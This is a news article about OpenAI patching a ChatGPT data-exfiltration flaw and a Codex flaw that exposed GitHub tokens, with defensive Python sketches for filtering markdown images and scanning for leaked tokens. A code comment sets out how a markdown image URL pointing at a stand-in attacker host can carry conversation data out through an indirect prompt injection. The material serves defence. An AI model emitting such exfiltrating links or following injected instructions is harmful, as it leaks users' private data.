
OpenAI has patched a critical security vulnerability in ChatGPT that could have allowed attackers to extract sensitive user data without users' knowledge, according to recent cybersecurity findings. The flaw, identified by researchers at Check Point, raised concerns about how AI systems handle and protect user information, particularly in enterprise environments.
The vulnerability reportedly enabled data exfiltration: attackers could secretly retrieve information from user interactions. In this case, malicious actors could exploit the system to access conversation data through indirect methods, a risk that grows as AI tools become more deeply integrated into everyday workflows.
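One exfiltration channel frequently reported in chat assistants is a markdown image whose URL smuggles conversation data to an attacker-controlled server when the client renders it. The sketch below is an illustrative output filter along those lines; the regex, the allowlist, and the function name are assumptions for demonstration, not OpenAI's actual mitigation.

```python
import re

# Illustrative allowlist of trusted image hosts; a real deployment
# would configure this per environment.
ALLOWED_IMAGE_HOSTS = {"cdn.example.com"}

# Matches markdown images: ![alt](http(s)://host/path...)
MD_IMAGE = re.compile(r"!\[[^\]]*\]\((https?://([^/\s)]+)[^)\s]*)\)")

def strip_untrusted_images(markdown: str) -> str:
    """Remove markdown images whose host is not allowlisted.

    A URL like https://evil.example/img?d=<secret> would otherwise make
    the rendering client send <secret> to the attacker automatically.
    """
    def _replace(match: re.Match) -> str:
        host = match.group(2).lower()
        return match.group(0) if host in ALLOWED_IMAGE_HOSTS else "[image removed]"
    return MD_IMAGE.sub(_replace, markdown)
```

Filtering the model's output at render time, rather than trusting the model to never emit such links, treats the model itself as untrusted, which is the usual defensive posture against indirect prompt injection.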
Beyond the ChatGPT issue, OpenAI addressed a separate security flaw in its Codex system that exposed GitHub authentication tokens. Such tokens could grant unauthorized access to private repositories, making the vulnerability particularly serious for developers and organizations relying on AI-assisted coding tools.
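Leaked GitHub tokens are relatively easy to detect because GitHub documents fixed prefixes for its token formats (`ghp_` for classic personal access tokens, `github_pat_` for fine-grained ones, and so on). A minimal scanning sketch, useful for scrubbing logs or transcripts before storage; the length bounds and function name are illustrative assumptions:

```python
import re

# Prefixes GitHub publishes for its token formats (classic PATs,
# OAuth tokens, app tokens, fine-grained PATs). Length bounds here
# are approximate and chosen for illustration.
GITHUB_TOKEN = re.compile(
    r"\b(?:ghp|gho|ghu|ghs|ghr)_[A-Za-z0-9]{36,}\b"
    r"|\bgithub_pat_[A-Za-z0-9_]{22,}\b"
)

def find_leaked_tokens(text: str) -> list[str]:
    """Return substrings that look like GitHub tokens so they can be
    revoked and redacted before the text is persisted or shared."""
    return GITHUB_TOKEN.findall(text)
```

Any hit should be treated as compromised and revoked immediately; detection is a backstop, not a substitute for keeping tokens out of AI-accessible contexts in the first place.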
The discovery underscores the evolving nature of cybersecurity threats in AI-driven platforms. As AI systems increasingly connect with external tools, APIs, and enterprise data sources, they expand the potential attack surface. Experts warn that these integrations, while enhancing functionality, also introduce new vectors for exploitation if not properly secured.
OpenAI has since rolled out patches to address both vulnerabilities, reinforcing its ongoing efforts to strengthen platform security. The company continues to invest in identifying and mitigating risks as AI adoption grows across industries, where safeguarding sensitive data remains a top priority for businesses and users alike.
The incident adds to a broader pattern of security challenges facing generative AI systems, where issues such as data leakage, prompt injection, and unauthorized access are becoming increasingly prominent. As organizations scale their use of AI, maintaining robust security frameworks will be essential to ensure trust and reliability in these technologies.
